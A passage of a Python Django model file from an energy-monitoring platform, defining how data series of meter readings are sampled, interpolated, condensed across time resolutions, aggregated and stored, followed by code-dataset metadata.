to_timestamp)\n return [first_sample, end_sample]\n\n # Check post-condition\n if self.is_accumulation():\n assert result == [] or \\\n result[0].from_timestamp == from_timestamp\n assert result == [] or result[-1].to_timestamp == to_timestamp\n\n return result\n else:\n result = []\n\n # RangeSamples are stored as (from_timestamp, value), with\n # to_timestamp being the timestamp of the next stored data.\n # Therefore we need to consider the most recent StoredData before\n # the (from_timestamp, to_timestamp) range.\n try:\n first_sample = [\n self.stored_data.filter(timestamp__lte=from_timestamp).\n order_by('-timestamp').\n values_list('timestamp', 'value')[0]]\n except IndexError:\n first_sample = []\n\n stored_data = first_sample + \\\n list(self.stored_data.filter(\n timestamp__gt=from_timestamp,\n timestamp__lt=to_timestamp).\n order_by('timestamp').\n values_list('timestamp', 'value'))\n\n for current_data, next_data in pairwise_extended(stored_data):\n if next_data:\n assert current_data[0] < next_data[0], \\\n 'unexpected range for sample (%r < %r)' % \\\n (current_data[0], next_data[0])\n result.append(\n self.create_range_sample(\n tz.normalize(\n max(from_timestamp,\n current_data[0]).astimezone(tz)),\n tz.normalize(next_data[0]).astimezone(tz),\n PhysicalQuantity(current_data[1], self.unit)))\n else:\n assert current_data[0] < to_timestamp\n result.append(\n self.create_range_sample(\n tz.normalize(\n max(from_timestamp,\n current_data[0])).astimezone(tz),\n tz.normalize(to_timestamp).astimezone(tz),\n PhysicalQuantity(current_data[1], self.unit)))\n\n # Check post-condition\n assert result[-1].from_timestamp >= from_timestamp\n assert result[-1].to_timestamp <= to_timestamp\n\n # Check post-condition\n if self.is_accumulation():\n assert result == [] or \\\n result[0].from_timestamp == from_timestamp\n assert result == [] or result[-1].to_timestamp == to_timestamp\n\n return result\n\n def get_condensed_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Get list of L{Sample}s defined by this C{DataSeries}.\n\n If the underlying function is a continuous rate the\n samples will have a given symbolic timespan distance.\n Otherwise the samples will cover intervals with the given\n symbolic timespan (not quite the same)\n\n @param from_timestamp: The earliest time used in the returned samples.\n\n @param sample_resolution: A L{RelativeTimeDelta} that define the sample\n resolution.\n\n @param to_timestamp: The final time included in the samples.\n\n @return: Returns an list of point L{Sample}s if the underlying function\n is a continuous rate. Otherwise a list of ranged L{Sample} is\n returned.\n\n @see: L{_get_condensed_samples}.\n\n @precondition: C{from_timestamp == condense.floor(\n from_timestamp, sample_resolution, from_timestamp.tzinfo)}\n\n @precondition: C{to_timestamp == condense.floor(\n to_timestamp, sample_resolution, to_timestamp.tzinfo)}\n\n @precondition: C{from_timestamp.tzinfo is not None}\n\n @precondition: C{to_timestamp.tzinfo is not None}\n\n @precondition: C{sample_resolution in condense.RESOLUTIONS}\n \"\"\"\n assert from_timestamp.tzinfo is not None\n assert to_timestamp.tzinfo is not None\n timezone = from_timestamp.tzinfo\n\n assert from_timestamp == condense.floor(\n from_timestamp, sample_resolution, timezone), \\\n 'from_timestamp=%r != ' \\\n 'floor(from_timestamp, sample_resolution=%r, timezone=%r)=%r' % (\n from_timestamp, sample_resolution, timezone, condense.floor(\n from_timestamp, sample_resolution, timezone))\n\n assert to_timestamp == condense.floor(\n to_timestamp, sample_resolution, timezone)\n\n assert sample_resolution in condense.RESOLUTIONS\n\n for sample in self.subclass_instance._get_condensed_samples(\n from_timestamp, sample_resolution, to_timestamp):\n assert from_timestamp <= sample.from_timestamp, \\\n 'error in %s: from_timestamp = %r > sample.from_timestamp = %r ' \\\n '(sample resolution = %s)' % (\n self.subclass_instance.__class__,\n from_timestamp, sample.from_timestamp, sample_resolution)\n\n assert sample.to_timestamp <= to_timestamp\n yield sample\n\n def _get_condensed_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n data_samples = self._condense_data_samples_recursive(\n from_timestamp, sample_resolution, to_timestamp=to_timestamp)\n next_timestamp = from_timestamp\n for sample_a, sample_b in pairwise_extended(data_samples):\n if sample_b is None:\n yield sample_a\n else:\n while next_timestamp < sample_a.from_timestamp:\n next_timestamp += sample_resolution\n while sample_a.from_timestamp <= next_timestamp < \\\n sample_b.from_timestamp:\n if sample_a.from_timestamp == next_timestamp:\n yield sample_a\n elif sample_a.is_point and sample_b.is_point:\n yield self._interpolate_extrapolate_sample(\n next_timestamp, sample_a, sample_b)\n next_timestamp += sample_resolution\n\n def _condense_accumulation_data_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Condense accumulation data samples within an interval defined by\n C{from_timestamp; to_timestamp]}, with C{sample_resolution} as the\n given resolution.\n\n Yields condensed range samples.\n \"\"\"\n def resolution_aligned_acc():\n # convert the sequence of \"raw\" samples from\n # get_samples() to a sequence of samples aligned to\n # the requested sample_resolution\n raw_accumulation = \\\n self.get_samples(from_timestamp, to_timestamp)\n next_timestamp = from_timestamp\n for sample1, sample2 in pairwise(raw_accumulation):\n while sample1.timestamp <= next_timestamp <= \\\n sample2.timestamp:\n yield self._interpolate_extrapolate_sample(\n next_timestamp,\n data_before=sample1, data_after=sample2)\n next_timestamp += sample_resolution\n\n for range_begin, range_end in pairwise(\n resolution_aligned_acc()):\n assert range_begin.timestamp >= from_timestamp\n assert range_end.timestamp <= to_timestamp\n yield self.create_range_sample(\n range_begin.timestamp,\n range_end.timestamp,\n range_end.physical_quantity -\n range_begin.physical_quantity,\n uncachable=(range_begin.uncachable or\n range_end.uncachable),\n extrapolated=(range_begin.extrapolated or\n range_end.extrapolated))\n\n def _condense_rate_data_samples(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Rate specific L{get_condensed_samples()} implementation.\n Arguments are the same (or left out).\n\n Splits the multiframe ranged rate sample into smaller ranged rate\n samples (C{sample_slices}) that fit inside each requested sample frame.\n While this is visually redundant, it supports caching performance (or\n at least is intended to).\n\n @return: Returns a list of samples. For each frame (of length\n C{sample_resolution}) the minimum and maximum samples are included in\n the result.\n\n @postcondition: The samples in the returned list are ordered by their\n timestamps.\n\n @precondition: C{self.is_rate()} returns C{True}.\n \"\"\"\n assert self.is_rate()\n\n raw_data_samples = list(self.get_samples(from_timestamp, to_timestamp))\n\n if not raw_data_samples:\n # short-circuit: absolutely no values in this data series.\n return []\n\n result = []\n next_time = from_timestamp + sample_resolution\n minimum_sample = None\n maximum_sample = None\n\n def flush_min_max():\n if minimum_sample is not None and maximum_sample is not None:\n if minimum_sample.to_timestamp < maximum_sample.to_timestamp:\n result.extend([minimum_sample, maximum_sample])\n elif minimum_sample == maximum_sample:\n result.append(minimum_sample)\n else:\n assert minimum_sample.to_timestamp > \\\n maximum_sample.to_timestamp\n result.extend([maximum_sample, minimum_sample])\n return (None, None)\n return (minimum_sample, maximum_sample)\n\n def update_min_max():\n # work-around while we wait for 'nonlocal' Python 3 keyword\n r1 = minimum_sample\n r2 = maximum_sample\n if minimum_sample is None or \\\n minimum_sample.physical_quantity > \\\n sample.physical_quantity:\n r1 = sample\n if maximum_sample is None or \\\n maximum_sample.physical_quantity < \\\n sample.physical_quantity:\n r2 = sample\n return (r1, r2)\n\n for sample in raw_data_samples:\n if sample.uncachable:\n # don't condense using uncachable samples (end-points are\n # included after this loop).\n continue\n\n flush = False\n sample_slices = []\n\n if sample.is_range and \\\n sample.from_timestamp < next_time and\\\n sample.to_timestamp > next_time:\n sample_slices.append(sample._replace(to_timestamp=next_time))\n\n while sample.to_timestamp > next_time:\n flush = True\n if sample.is_range and not sample.in_closed_interval(\n next_time, next_time + sample_resolution) and \\\n sample.from_timestamp < next_time + sample_resolution:\n assert max(next_time, sample.from_timestamp) < min(\n next_time + sample_resolution, sample.to_timestamp), \\\n 'next_time=%r, sample=%r, sample_resolution=%r' % (\n next_time, sample, sample_resolution)\n sample_slices.append(sample._replace(\n from_timestamp=max(next_time, sample.from_timestamp),\n to_timestamp=min(\n next_time + sample_resolution,\n sample.to_timestamp)))\n next_time += sample_resolution\n\n if sample_slices:\n assert len(sample_slices) >= 2\n assert flush\n sample = sample_slices[0]\n minimum_sample, maximum_sample = update_min_max()\n minimum_sample, maximum_sample = flush_min_max()\n result.extend(sample_slices[1:-1])\n sample = sample_slices[-1]\n elif flush:\n minimum_sample, maximum_sample = flush_min_max()\n\n minimum_sample, maximum_sample = update_min_max()\n\n minimum_sample, maximum_sample = flush_min_max()\n\n return result\n\n def get_recursive_condense_resolution(self, resolution):\n \"\"\"\n Get the recursive condense resolution for the given C{resolution}.\n\n @return: A resolution to be used for condensing C{resolution}\n recursively or C{None}. If C{None} is returned, condensation for the\n given resolution will not be calculated recursively.\n\n This method is abstract so subclasses must implement it. The following\n implementation would work for most DataSeries specializations. However\n it would often be verry inefficient for small condense resolutions,\n which is why it is not the default::\n\n def get_recursive_condense_resolution(self, resolution):\n return condense.next_resolution(resolution)\n\n @see L{condense.next_resolution()}\n \"\"\"\n raise NotImplementedError(\n \"%s did't implement this method\" % self.__class__)\n\n def _condense_data_samples_recursive(\n self, from_timestamp, sample_resolution, to_timestamp):\n \"\"\"\n Method with similar arguments and result as\n L{get_condensed_samples()}, but intended for being implemented in\n L{DataSeries} specializations that wish to utilize the implicit caching\n implemented in L{DataSeries.get_condensed_samples()}.\n\n Not intended to be called from outside\n L{DataSeries.get_condensed_samples()}, except for testing of the\n concrete C{_condense_data_samples_recursive()} implementation.\n \"\"\"\n timezone = from_timestamp.tzinfo\n assert from_timestamp == condense.floor(\n from_timestamp, sample_resolution, timezone)\n to_timestamp = condense.floor(\n to_timestamp, sample_resolution, timezone)\n\n refined_resolution = self.get_recursive_condense_resolution(\n sample_resolution)\n\n if refined_resolution is None:\n if self.is_accumulation():\n condensed_samples = self._condense_accumulation_data_samples(\n from_timestamp, sample_resolution, to_timestamp)\n else:\n assert self.is_rate()\n condensed_samples = self._condense_rate_data_samples(\n from_timestamp, sample_resolution, to_timestamp)\n\n for sample in condensed_samples:\n yield sample\n else:\n if self.is_accumulation():\n def extract_target_from_time(sample):\n return condense.floor(\n sample.from_timestamp, sample_resolution, timezone)\n\n for current_from_time, current_samples in itertools.groupby(\n self.get_condensed_samples(\n from_timestamp, refined_resolution, to_timestamp),\n key=extract_target_from_time):\n current_to_time = current_from_time + sample_resolution\n assert current_from_time >= from_timestamp\n assert current_to_time <= to_timestamp\n\n for condensed_sample in self.condense_accumulation(\n current_from_time,\n current_to_time,\n list(current_samples)):\n yield condensed_sample\n\n else:\n assert self.is_rate()\n\n condensed_samples = list(\n self.get_condensed_samples(\n from_timestamp, refined_resolution, to_timestamp))\n\n for frame_start, frame_end in pairwise(\n count_extended(from_timestamp, sample_resolution)):\n\n if frame_start == to_timestamp:\n break\n\n for condensed_sample in self.condense_rate(\n list(\n itertools.takewhile(\n lambda s: s.to_timestamp <= frame_end,\n condensed_samples))):\n yield condensed_sample\n\n condensed_samples = list(\n itertools.dropwhile(\n lambda s: s.to_timestamp < frame_end,\n condensed_samples))\n\n CONTINUOUS_ACCUMULATION_ROLES = (\n DataRoleField.CONSUMPTION,\n DataRoleField.CO2,\n DataRoleField.COST,\n DataRoleField.MASS,\n DataRoleField.TIME,\n DataRoleField.STANDARD_HEATING_DEGREE_DAYS,\n DataRoleField.HEATING_DEGREE_DAYS,\n DataRoleField.HEATING_DEGREE_DAYS_CORRECTED_CONSUMPTION,\n DataRoleField.VOLUME,\n DataRoleField.ENERGY_DRIVER,\n DataRoleField.PRODUCTION,\n DataRoleField.REACTIVE_ENERGY,\n )\n\n PIECEWISE_CONSTANT_ACCUMULATION_ROLES = ()\n\n ACCUMULATION_ROLES = CONTINUOUS_ACCUMULATION_ROLES + \\\n PIECEWISE_CONSTANT_ACCUMULATION_ROLES\n\n PIECEWISE_CONSTANT_RATE_ROLES = (\n DataRoleField.STATE,\n DataRoleField.HEAT_TARIFF,\n DataRoleField.GAS_TARIFF,\n DataRoleField.ELECTRICITY_TARIFF,\n DataRoleField.WATER_TARIFF,\n DataRoleField.OIL_TARIFF,\n DataRoleField.CO2_QUOTIENT,\n DataRoleField.EMPLOYEES,\n DataRoleField.AREA,\n DataRoleField.HIDDEN_ELECTRICITY_TARIFF,\n DataRoleField.HIDDEN_GAS_TARIFF,\n DataRoleField.HIDDEN_HEAT_TARIFF,\n DataRoleField.HIDDEN_WATER_TARIFF,\n DataRoleField.HIDDEN_OIL_TARIFF,\n )\n\n CONTINUOUS_RATE_ROLES = (\n DataRoleField.POWER,\n DataRoleField.REACTIVE_POWER,\n DataRoleField.POWER_FACTOR,\n DataRoleField.ABSOLUTE_TEMPERATURE,\n DataRoleField.RELATIVE_TEMPERATURE,\n DataRoleField.VOLUME_FLOW,\n DataRoleField.VOLTAGE,\n DataRoleField.CURRENT,\n DataRoleField.FREQUENCY,\n DataRoleField.PRESSURE,\n DataRoleField.LINEAR_REGRESSION,\n DataRoleField.EFFICIENCY,\n )\n\n RATE_ROLES = PIECEWISE_CONSTANT_RATE_ROLES + CONTINUOUS_RATE_ROLES\n\n INTERVAL_FUNCTION_ROLES = (\n DataRoleField.MEAN_COOLDOWN_TEMPERATURE,\n DataRoleField.CONSUMPTION_UTILIZATION_EMPLOYEES,\n DataRoleField.CONSUMPTION_UTILIZATION_AREA,\n DataRoleField.PRODUCTION_ENPI,\n DataRoleField.HEAT_LOSS_COEFFICIENT,\n )\n\n HIDDEN_ROLES = (\n DataRoleField.HIDDEN_ELECTRICITY_TARIFF,\n DataRoleField.HIDDEN_GAS_TARIFF,\n DataRoleField.HIDDEN_HEAT_TARIFF,\n DataRoleField.HIDDEN_WATER_TARIFF,\n DataRoleField.HIDDEN_OIL_TARIFF,\n DataRoleField.HIDDEN,\n )\n\n def get_underlying_function(self):\n \"\"\"\n Method for retrieving a description of the underlying function of the\n samples kept in this C{DataSeries}.\n\n @return: One of C{UNDERLYING_FUNCTION_CHOICES}.\n\n @note: It is always more efficient to check for role inclusion in the\n relevant constant list. This is useful to know when querying for a\n particular kind of underlying functions.\n\n @bug: May run clean, though this method returns a result and therefore\n should not be expected to have destructive side-effects.\n \"\"\"\n if self.role is None:\n self.clean()\n\n assert self.role is not None\n if self.role in self.CONTINUOUS_ACCUMULATION_ROLES:\n return self.CONTINUOUS_ACCUMULATION\n elif self.role in self.PIECEWISE_CONSTANT_RATE_ROLES:\n return self.PIECEWISE_CONSTANT_RATE\n elif self.role in self.CONTINUOUS_RATE_ROLES:\n return self.CONTINUOUS_RATE\n elif self.role in self.PIECEWISE_CONSTANT_ACCUMULATION_ROLES:\n return self.PIECEWISE_CONSTANT_ACCUMULATION\n elif self.role in self.INTERVAL_FUNCTION_ROLES:\n return self.INTERVAL_FUNCTION\n\n assert False, \"Underlying function for %d is undefined\" % self.role\n\n def is_rate(self):\n \"\"\"\n Check if this C{DataSeries} is a rate.\n\n @return: Return C{True} if this C{DataSeries} is a rate.\n \"\"\"\n return self.get_underlying_function() in [self.CONTINUOUS_RATE,\n self.PIECEWISE_CONSTANT_RATE]\n\n def is_accumulation(self):\n \"\"\"\n Check if this C{DataSeries} is an accumulation.\n\n @return: Returns C{True} if this C{DataSeries} is an\n accumulation. C{False} otherwise.\n \"\"\"\n return self.get_underlying_function() in [\n self.CONTINUOUS_ACCUMULATION, self.PIECEWISE_CONSTANT_ACCUMULATION]\n\n def is_continuous(self):\n \"\"\"\n Check if this C{DataSereis} is continuous.\n \"\"\"\n return self.get_underlying_function() in [\n self.CONTINUOUS_ACCUMULATION,\n self.CONTINUOUS_RATE]\n\n def is_piecewise_constant(self):\n \"\"\"\n Check if this C{DataSeries} has a piecewise constant underlying\n function.\n\n @return: Returns C{True} if this C{DataSeries} is piecewise constant,\n C{False} otherwise.\n \"\"\"\n\n return self.get_underlying_function() in [\n self.PIECEWISE_CONSTANT_RATE, self.PIECEWISE_CONSTANT_ACCUMULATION]\n\n def is_tariff(self):\n \"\"\"\n Check if this C{DataSeries} is a tariff\n\n @return: Returns C{True} if this C{DataSeries} is a tariff C{False}\n otherwise.\n \"\"\"\n return self.role in DataRoleField.TARIFFS\n\n def _interpolate_extrapolate_sample(self, timestamp,\n data_before=None, data_after=None):\n \"\"\"\n Get potentially extarpolated or linear interpolated sample at given\n C{timestamp}.\n\n @keyword data_before: A StoredData or point Sample before C{timestamp}.\n If C{None}, the a query will be made to construct a C{data_before}.\n\n @keyword data_after: A StoredData or point Sample after C{timestamp}.\n If C{None}, the a query will be made to construct a C{data_after}.\n\n @return: If a sample at the exact timestamp requested is found, it is\n returned. If samples on both sides of the timestamp requested are\n found, an interpolated value is computed and returned. If samples on\n only one side are available, the value from the closest sample is used\n and returned (uncachable and extrapolated). If no samples are\n available, neither before nor after the requested timestamp, None is\n returned.\n\n @note: The interpolation used is linear for continuous underlying\n functions, and trivial for piecewise constant underlying functions.\n\n @note: Extrapolation used is always trivial, i.e. extending with copy\n of end-point value.\n\n @note: This method is only intended for use with C{DataSeries} that\n actually store their data as L{StoredData}, unless both C{data_before}\n and C{data_after} are given.\n \"\"\"\n if data_before is not None:\n if isinstance(data_before, StoredData):\n data_before = self.create_point_sample(\n data_before.timestamp,\n PhysicalQuantity(data_before.value, self.unit))\n assert isinstance(data_before, Sample)\n assert data_before.timestamp <= timestamp\n\n if data_after is not None:\n if isinstance(data_after, StoredData):\n data_after = self.create_point_sample(\n data_after.timestamp,\n PhysicalQuantity(data_after.value, self.unit))\n assert isinstance(data_after, Sample)\n assert data_after.timestamp >= timestamp\n\n if self.is_continuous():\n try:\n if data_before is None:\n stored_data_before = self.stored_data.filter(\n timestamp__lte=timestamp).order_by('-timestamp')[0]\n data_before = self.create_point_sample(\n stored_data_before.timestamp,\n PhysicalQuantity(stored_data_before.value, self.unit))\n # short circuit; if \"before\" matches timestamp exactly, return\n # that.\n if data_before.timestamp == timestamp:\n assert isinstance(data_before, Sample)\n return data_before\n except IndexError:\n data_before = None\n try:\n if data_after is None:\n stored_data_after = self.stored_data.filter(\n timestamp__gte=timestamp).order_by('timestamp')[0]\n data_after = self.create_point_sample(\n stored_data_after.timestamp,\n PhysicalQuantity(stored_data_after.value, self.unit))\n # short circuit; if \"after\" matches timestamp exactly, return\n # that\n if data_after.timestamp == timestamp:\n assert isinstance(data_after, Sample)\n return data_after\n except IndexError:\n data_after = None\n if data_before is not None and data_after is not None:\n assert data_before.timestamp < data_after.timestamp\n timespan_total = (data_after.timestamp -\n data_before.timestamp).total_seconds()\n timespan_before = (timestamp -\n data_before.timestamp).total_seconds()\n delta_value = data_after.physical_quantity - \\\n data_before.physical_quantity\n rate = delta_value / Fraction(timespan_total)\n val = data_before.physical_quantity + rate * \\\n Fraction(timespan_before)\n\n # interpolate\n return self.create_point_sample(\n timestamp, val,\n uncachable=data_before.uncachable or data_after.uncachable,\n extrapolated=data_before.extrapolated or\n data_after.extrapolated)\n\n elif data_before is not None:\n assert data_after is None\n # extrapolate\n return self.create_point_sample(\n timestamp, data_before.physical_quantity,\n uncachable=True, extrapolated=True)\n elif data_after is not None:\n assert data_before is None\n # extrapolate\n return self.create_point_sample(\n timestamp,\n data_after.physical_quantity,\n uncachable=True, extrapolated=True)\n else:\n assert data_before is None and data_after is None\n return None\n\n else:\n assert self.is_piecewise_constant()\n try:\n if data_before is None:\n stored_data_before = self.stored_data.filter(\n timestamp__lte=timestamp).order_by('-timestamp')[0]\n data_before = self.create_point_sample(\n stored_data_before.timestamp,\n PhysicalQuantity(stored_data_before.value, self.unit))\n # short circuit; if \"before\" matches timestamp exactly, return\n # that\n if data_before.timestamp == timestamp:\n assert isinstance(data_before, Sample)\n return data_before\n uncachable = extrapolated = not (\n data_after is not None and\n self.stored_data.filter(timestamp__gt=timestamp).exists())\n return self.create_point_sample(\n timestamp, PhysicalQuantity(data_before.value, self.unit),\n uncachable=uncachable, extrapolated=extrapolated)\n except IndexError:\n try:\n if data_after is None:\n data_after = self.stored_data.filter(\n timestamp__gt=timestamp).order_by('timestamp')[0]\n return self.create_point_sample(\n timestamp,\n PhysicalQuantity(data_after.value, self.unit),\n uncachable=True, extrapolated=True)\n except IndexError:\n return None\n\n def calculate_development(self, from_timestamp, to_timestamp):\n \"\"\"\n Calculate the development between two points in time. Extrapolates if\n not enough data.\n\n @param from_timestamp: The first timestamp.\n\n @param to_timestamp: The last timestamp.\n\n @return: Return a L{Range} sample holding the development between\n C{from_timestamp} and C{to_timestamp}. If no data was available at\n all, None is returned.\n\n @postcondition: If C{None} is returned, the domain of this\n C{DataSeries} is empty.\n \"\"\"\n assert self.is_accumulation()\n\n try:\n from_sample = next(iter(\n self.get_samples(from_timestamp, from_timestamp)))\n to_sample = next(iter(\n self.get_samples(to_timestamp, to_timestamp)))\n\n return self.create_range_sample(\n from_timestamp, to_timestamp,\n to_sample.physical_quantity - from_sample.physical_quantity,\n uncachable=(\n from_sample.uncachable or\n to_sample.uncachable),\n extrapolated=(\n from_sample.extrapolated or\n to_sample.extrapolated))\n except StopIteration:\n return None\n\n def depends_on(self):\n \"\"\"\n Recursively collects a list of C{DataSeries} that this C{DataSeries}\n depends on.\n\n @see L{dataseries}\n\n @return: A list of L{DataSeries} that this C{DataSeries} depends upon.\n \"\"\"\n return []\n\n def latest_sample(self, from_timestamp, to_timestamp):\n \"\"\"\n The latest sample in the given time interval, M{[C{from_timestamp},\n C{to_timestamp})} for this C{DerivedDataSeries}.\n\n @precondition: C{self.is_rate()}.\n\n @return: Return a L{PointSample}, L{PointSampleCurrency} if samples\n are available in the given time interval, or C{None} if no sample is\n available.\n \"\"\"\n assert self.is_rate()\n raw_data = self.get_samples(from_timestamp, to_timestamp)\n\n for sample in reversed(list(raw_data)):\n if sample.cachable:\n return sample\n\n return None\n\n def aggregated_samples(self, from_timestamp, to_timestamp):\n \"\"\"\n The average sample, minimum sample and maximum sample of the given time\n interval, M{[C{from_timestamp}, C{to_timestamp}]}\n\n @precondition: C{self.is_rate()}\n\n @return: A tripple C{(avg, min, max)}, where:\n\n - C{avg} is a L{RangeSample} or a L{RangeSampleCurrency} holding the\n average value of the given timespan. If insuficient values were\n available to interpolate at the end-points, the returned C{avg},\n may indicate a subinterval of the given time interval. If\n insuficient values for calculating an average in the given time\n interval, C{avg} is C{None}.\n\n - C{min, max} are L{PointSample}s or L{PointSampleCurrency}s holding\n the minimum and maximum value in the given timespan. If it is not\n even possible to interpolate a single value in the timespan, C{min,\n max} will be C{None, None}. If there are multiple extremes only\n the earliest minimum and the earliest maximum will be included in\n the result.\n\n @postcondition: If the domain overlaps the given time interval, neither\n element in the returned tuple shall be None.\n\n @note: The term aggregates is in this context taken from the SQL\n terminology, where C{AVG}, C{MIN}, C{MAX} (and even C{COUNT}) are\n aggregates of a query result, not to be confused with the object\n oriented programming term spelled the same way. However, there is an\n important semantic differense between the SQL C{AVG} and the average\n returned by this method. In particular, the SQL C{AVG} does nothing to\n mimic the average of the underlying function, whereas, the average\n included in the result of this method is the mean value of the curve\n defined by the linear interpolation between the points of this data\n series across the given interval. But also, the SQL C{MIN} and C{MAX}\n might be wrong, as interpolation values at the end-points of the\n interval should also be considered in case actual StoredData is not\n available at these timestamps.\n\n @note: This method is implemented strictly on top of\n L{get_samples()}, and so any valid override of\n L{get_samples()} should leave this C{aggregated_samples()}\n method in a working state.\n \"\"\"\n assert self.is_rate()\n consumption = None\n minimum = None\n maximum = None\n for current_sample, next_sample in \\\n pairwise_extended(itertools.ifilter(\n lambda s: not s.extrapolated,\n self.get_samples(from_timestamp, to_timestamp))):\n\n final_timestamp = current_sample.to_timestamp\n\n if minimum is None or \\\n current_sample.physical_quantity < \\\n minimum.physical_quantity:\n minimum = current_sample\n\n if maximum is None or \\\n current_sample.physical_quantity > \\\n maximum.physical_quantity:\n maximum = current_sample\n\n if self.is_piecewise_constant():\n # Area under horizontal line (piecewise constant)\n delta_consumption = (\n PhysicalQuantity(\n (current_sample.to_timestamp -\n current_sample.from_timestamp).\n total_seconds(), 'second') *\n current_sample.physical_quantity)\n else:\n if next_sample is None:\n break\n\n # Area under slope (interpolation of continuous)\n delta_consumption = (\n PhysicalQuantity(\n (next_sample.timestamp -\n current_sample.timestamp).\n total_seconds(), 'second') *\n (\n current_sample.physical_quantity +\n next_sample.physical_quantity) /\n PhysicalQuantity(2, 'none'))\n\n if consumption is not None:\n consumption += delta_consumption\n else:\n first_timestamp = current_sample.from_timestamp\n consumption = delta_consumption\n\n if minimum is not None and maximum is not None:\n if consumption is not None:\n average_value = consumption / PhysicalQuantity(\n (final_timestamp - first_timestamp).total_seconds(),\n 'second')\n average_sample = self.create_range_sample(\n first_timestamp, final_timestamp,\n average_value)\n else:\n average_sample = maximum\n else:\n # Nothing at all yielded from self.get_samples(), or\n # everything yielded was extrapolated. If there is a\n # non-zero-length overlap between requested period and domain, this\n # should not occur.\n minimum = None\n maximum = None\n average_sample = None\n\n return (average_sample, minimum, maximum)\n\n def create_point_sample(\n self, timestamp, physical_quantity,\n uncachable=False, extrapolated=False):\n \"\"\"\n Factory method for creating a L{PointSample} or L{PointSampleCurrency}\n depending on what will suit this C{DataSeries}.\n\n @param timestamp: The timestamp of the created sample.\n\n @param physical_quantity: The value of the created sample.\n\n @param uncachable: If C{True} the returned point sample will never be\n cached.\n\n @param extrapolated: If C{True} the returned point sample is marked as\n extrapolated.\n\n @return: A L{PointSample} or L{PointSampleCurrency} with unit and\n possibly currency set to C{self.unit} and C{self.currency}\n respectively.\n \"\"\"\n assert physical_quantity.compatible_unit(self.unit), \\\n '%s not compatible with %s' % (physical_quantity.units, self.unit)\n\n return Sample(\n timestamp, timestamp, physical_quantity,\n not uncachable, extrapolated)\n\n def create_range_sample(\n self, from_timestamp, to_timestamp, physical_quantity,\n uncachable=False, extrapolated=False):\n \"\"\"\n @param from_timestamp: The start-point of the range of the created\n sample.\n\n @param to_timestamp: The end-point of the range of the created sample.\n\n @param physical_quantity: The value of the created sample.\n\n @param uncachable: If C{True} the returned range sample will never be\n cached.\n\n @return: A L{RangeSample} or L{RangeSampleCurrency} with unit and\n possibly currency set to C{self.unit} and C{self.currency}\n respectively.\n \"\"\"\n assert physical_quantity.compatible_unit(self.unit), \\\n '%s not compatible with %s' % (physical_quantity.units, self.unit)\n\n return Sample(\n from_timestamp, to_timestamp, physical_quantity,\n not uncachable, extrapolated)\n\n def convert(self, value, target_unit):\n \"\"\"\n Convert C{value} to C{target_unit}, assuming the unit of C{value} is\n C{self.unit}.\n\n @precondition: C{PhysicalQuantity.compatible_units(target_unit,\n self.unit)} is C{True} or C{target_unit in ['celsius'] and\n PhysicalQuantity.compatible_units('kelvin', self.unit)}.\n \"\"\"\n quantity = PhysicalQuantity(value, self.unit)\n if target_unit == 'celsius':\n assert PhysicalQuantity.compatible_units('kelvin', self.unit)\n if self.role == DataRoleField.ABSOLUTE_TEMPERATURE:\n quantity -= PhysicalQuantity(Fraction(\"273.15\"), 'kelvin')\n else:\n assert self.role == DataRoleField.RELATIVE_TEMPERATURE\n return quantity.convert('kelvin')\n else:\n assert PhysicalQuantity.compatible_units(target_unit, self.unit)\n return quantity.convert(target_unit)\n\n def condense_accumulation(self, from_timestamp, to_timestamp, samples):\n return [\n self.create_range_sample(\n from_timestamp=from_timestamp,\n to_timestamp=to_timestamp,\n physical_quantity=sum(\n (sample.physical_quantity for sample in samples),\n PhysicalQuantity(0, self.unit)),\n uncachable=(\n (not samples) or\n from_timestamp != samples[0].from_timestamp or\n to_timestamp != samples[-1].to_timestamp or\n any((not sample.cachable for sample in samples))),\n extrapolated=any((sample.extrapolated for sample in samples)))]\n\n def condense_rate(self, samples):\n \"\"\"\n Condense rate by returning up to two samples that are local extremes\n (minimum, and maximum) within the given C{samples}.\n\n If there are more than two such local extremes it is not specified\n which valid pair of them will be returned in particular, only that some\n valid pair will be returned.\n \"\"\"\n if samples:\n # The literal set serves to ensure that the same sample is not\n # yielded twice.\n return sorted(\n {\n min(samples, key=attrgetter('physical_quantity')),\n max(samples, key=attrgetter('physical_quantity'))},\n key=attrgetter('from_timestamp'))\n else:\n return []\n\n def get_preferred_unit_converter(self):\n \"\"\"\n Get preferred unit converter.\n\n @see: L{preferredunits.get_preferred_unit_converter}.\n\n @precondition: C{self.customer is not None}\n \"\"\"\n assert self.customer is not None or get_customer() is not None\n\n return get_preferred_unit_converter(\n self.role, utility_type=self.utility_type,\n customer=self.customer, unit=self.unit)\n\n def is_absolute_temperature(self):\n return self.role == DataRoleField.ABSOLUTE_TEMPERATURE\n\n\nclass StoredData(models.Model):\n \"\"\"\n C{StoredData} is a class for storing data belonging to a\n L{DataSeries}, or a specialization of such.\n\n @ivar data_series: The L{DataSeries} this C{StoredData} belongs to.\n\n @ivar value: The integer value held by this C{StoredData}. The unit of\n this value is found in C{data_series.unit}.\n\n @ivar timestamp: A timestamp that this C{StoredData} belongs to. If this\n C{StoredData} represents a L{PointSample}, the C{timestamp} obviously\n correspond to L{PointSample.timestamp}. If this C{StoredData} represents a\n L{RangeSample}, the C{timestamp} correspond to\n L{RangeSample.from_timestamp}, and the next C{StoredData} define the\n L{RangeSample.to_timestamp}.\n \"\"\"\n data_series = models.ForeignKey(DataSeries, on_delete=models.CASCADE,\n related_name=\"stored_data\")\n value = models.BigIntegerField(_('value'))\n timestamp = models.DateTimeField(_('timestamp'))\n\n class Meta:\n verbose_name = _('stored data')\n verbose_name_plural = _('stored data')\n unique_together = (\"data_series\", \"timestamp\")\n index_together = [\n ['data_series', 'timestamp'],\n ]\n ordering = [\"timestamp\"]\n app_label = 'measurementpoints'\n\n def __unicode__(self):\n return u\"%s, %s\" % (self.timestamp, self.value)\n", "sub_path": "legacy/measurementpoints/models/dataseries.py", "file_name": "dataseries.py", "file_ext": "py", "file_size_in_byte": 59640, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gridplatform.trackuser.managers.FilteringQuerySetMixinBase", "line_number": 76, "usage_type": "name"}, {"api_name": "gridplatform.trackuser.get_user", "line_number": 83, "usage_type": 